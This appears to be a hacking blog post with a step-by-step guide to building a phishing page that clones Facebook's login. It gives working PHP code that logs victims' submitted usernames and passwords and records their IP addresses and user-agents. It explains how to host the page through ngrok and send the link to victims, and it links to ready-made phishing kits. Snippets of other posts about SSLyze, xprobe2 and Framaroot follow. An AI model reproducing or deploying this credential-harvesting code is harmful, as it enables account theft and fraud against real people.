Skip to main content

How to create phishing page and how to host complete guide

 Hello guy's, Welcome to another article, Recently i have post lot's of article about creating phishing page. Although the principle behind each guide is slimier. In this post I will explain all necessary step's to create phishing page. So this guide will help you to make your own phishing page at any site.

What is phishing?

Phishing is when someone tries to get access to your Facebook account by sending you a suspicious message or link that asks for your personal information. If they get into your account, they may use your account to send spam.

Requirement's

  • Any Device
  • Chrome Browser

Feature's

  • Get username and password
  • Get User-Agent information
  • Get Otp

How to create phishing page

Step 1: Download HTML index page of Target

First you choose your target web page. Once you selected you target go to that web page like I'm choose Facebook
phishing page

Once you enter you target website click right said mouse button and click " View page source " option

phishing page

Once you click " View page source " Option open new window that will be like this below image.

phishing page

Now press "Ctrl+A" to Copy all page source information and past new Note pad

phishing page

Now press "Ctrl+F" Option to open find bar then type "Action=" to find bar see this below image

phishing page tutorial
Now Remove "/login/privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjEwNzY3NTUzLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D" This command and type " login.php" once you change this save that note pad name of "login.html"

phishing page tutorial

phishing page tutorial

Step 2: Creating Php file For Password Harvesting

Now we need to create php file to harvesting the username and password so copy this below code and past your note pad name of "login.php"
 <?php
header ('Location: facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>

phishing page tutorial

If you need to crate any other website phishing page you need to change one small thing to " login.php" file that is replace "facebook.com" in header value and type which website to you make without "Https or Http" and "www"
phishing page tutorial

Step 3: create php file to get user-agent information

Now we need to create another php file to capture victim "user-agent" information so you copy this below all command and past your note pad and save it with the name of "ip.php"

<?php

if (!empty($_SERVER['HTTP_CLIENT_IP']))
    {
      $ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";
    }
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
      $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";
    }
else
    {
      $ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
    }
$useragent = " User-Agent: ";
$browser = $_SERVER['HTTP_USER_AGENT'];


$file = 'ip.txt';
$victim = "IP: ";
$fp = fopen($file, 'a');

fwrite($fp, $victim);
fwrite($fp, $ipaddress);
fwrite($fp, $useragent);
fwrite($fp, $browser);


fclose($fp);
phishing page tutorial

phishing page tutorial

Step 3: Connect all files into one file

Once you complete above all step's you have 3 files now connect all three file's into one file so copy this below command and past your note pad with the name of "index.php"
 <?php
include 'ip.php';
header('Location: login.html');
exit
?>
phishing page tutorial

phishing page tutorial

Step 4: Host phishing page

More way's are there to hosting phishing page's but now we discuss'd two method first method is host you linux or termux with ngrok

First you open terminal inside the phishing page's and type this below command
php -S localhost:4444
phishing page tutorial

Now minimized terminal and start your ngrok with the port of " 4444 "

ngrok

Now share this ngrok link to your victim

Step 5: Victim View

Once your victim click Ngrok link that link will show this below image

phishing page hosting

If your victim type any data on this page

phishing page hosting

 That all information save'd into you system see this below image.

phishing page information gathering

That's it Now you can create any website to phishing page but this hosting method you will wait without closing your terminal until your victim click your phishing link But if you host all phishing files in 000webhost you don't wait.
If you don't know how to host phishing page in 000webhost  please Read this below article.

All website phishing pages download link





Labels:

Comments

  1. NickApril 12, 2021 at 9:54 PM

    Bro please tell me the password for the zip file please ��������

    ReplyDelete
  2. GandhiApril 17, 2021 at 5:06 PM

    errorsfind.com

    ReplyDelete

Post a Comment

Popular posts from this blog

Sslyze-analyze the SSL configuration of a server by connecting to it

 What is SSLyze? SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify mis-configurations affecting their SSL servers. Feature of Sslyze Multi-processed and multi-threaded scanning (it’s fast) SSL 2.0/3.0 and TLS 1.0/1.1/1.2 compatibility Performance testing: session resumption and TLS tickets support Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more Server certificate validation and revocation checking through OCSP stapling Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP and FTP Support for client certificates when scanning servers that perform mutual authentication XML output to further process the scan results How to install sslyze Just you type this below command in your terminal this command's will help you to install sslyze on your computer and termux. Linux sudo apt-get install ssl...
Post a Comment
Read more

xprobe2 - A Remote active operating system fingerprinting tool

What is Xprobe2? xprobe2 - A Remote active operating system fingerprinting tool xprobe2 is an active operating system fingerprinting tool with a different approach to operating system fingerprinting. xprobe2 relies on fuzzy signature matching, probabilistic guesses, multiple matches simultaneously, and a signature database. The operation of xprobe2 is described in a paper titled " xprobe2 - A 'Fuzzy ' Approach to Remote Active Operating System Fingerprinting" Option's How to install Xprobe2 First you need to open your terminal after that you type this below command in your terminal this command will help you to install this xprobe2 package. Linux sudo apt install xprobe Termux pkg install xprobe How to use xprobe Just use this below command or see this below image. sudo xprobe2 ( Domain name ) Example's xprobe2 -v -D 1 -D 2 192.168.1.10 Will launch an OS fingerprinting attempt targeting 192.168.1.10. Modules 1 and 2, which are reachability tests, will be di...
Post a Comment
Read more

Root android phone with one click without computer

 What is framaroot? Framaroot is a free android app which can root almost every device in one click without any need of PC/Computer. Framaroot has its own complex exploits which vary from device to device according to its chipset model and android version. In newer versions of Framaroot, you can unroot your android phone in one click too Feature of Framaroot Root android phone with one click Install SuperSu Unroot or execute Advanced user How to Download and install Framaroot First you download framaroot application on your android phone so click this below download button. Now Install it with a file explorer or directly from your internet browser, if android warn you about security risk, say OK and check Unknown sources to allow install of applications outside of Play Store. How to use Open your Framaroot and select one of the following action: Install SuperSU, Unroot or Execute script (for advanced users) Possible case once application is launched A popup saying "Your device see...
1 comment
Read more